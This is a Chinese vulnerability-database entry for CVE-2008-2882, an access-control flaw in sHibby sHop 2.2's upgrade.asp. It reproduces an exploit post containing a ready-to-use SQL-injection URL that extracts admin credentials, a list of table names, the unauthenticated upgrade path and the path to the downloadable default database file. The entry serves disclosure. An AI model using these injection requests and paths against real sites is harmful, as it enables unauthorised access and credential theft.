aspindir shibby_shop upgrade.asp 权限许可和访问控制漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1186459 漏洞类型 权限许可和访问控制
发布时间 2008-06-26 更新时间 2008-06-26
CVE编号 CVE-2008-2882 CNNVD-ID CNNVD-200806-381
漏洞平台 N/A CVSS评分 7.5
|漏洞来源
https://www.securityfocus.com/bid/84927
https://cxsecurity.com/issue/WLB-2008060111
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200806-381
|漏洞详情
sHibbysHop2.2及其早期版本的upgrade.asp不要求管理权限验证,这会允许远程攻击者通过提交一个直接的请求来上传一个文件或具有未明的其他影响。
|漏洞EXP
================================================================

[+] Author : KnocKout
[+] Special Thankz : Dr.Kacak
[+] System 0VerfL0verZ

=================================================================

Script : sHibby sHop
Verz: 2.2
Download : http://aspindir.com/goster/4476

 

SQL attack ;

http://target.com/path/default.asp?git=4&sayfa=-3+union+all+select+0,copy,keyword+from+ayarlar

Tables;

yasakli
ustmenu
urun_yorum
urun
ureticiler
tema
site_gel
siparis
sayfa
say_site
say_ip
say_hit
online
kategori
banner
ayarlar

 ------------
 
 Update file ( Direct Access )

 http://localsite.com/path/upgrade.asp
 

And default Database file

http://target.com/path/Db/urun.mdb

###############################################################
|受影响的产品
Aspindir Shibby Shop 2.2
|参考资料

来源:XF
名称:shibbyshop-upgrade-urun-unauth-access(43296)
链接:http://xforce.iss.net/xforce/xfdb/43296
来源:SREASON
名称:3962
链接:http://securityreason.com/securityalert/3962
来源:SECUNIA
名称:30787
链接:http://secunia.com/advisories/30787
来源:MILW0RM
名称:5895
链接:http://milw0rm.com/exploits/5895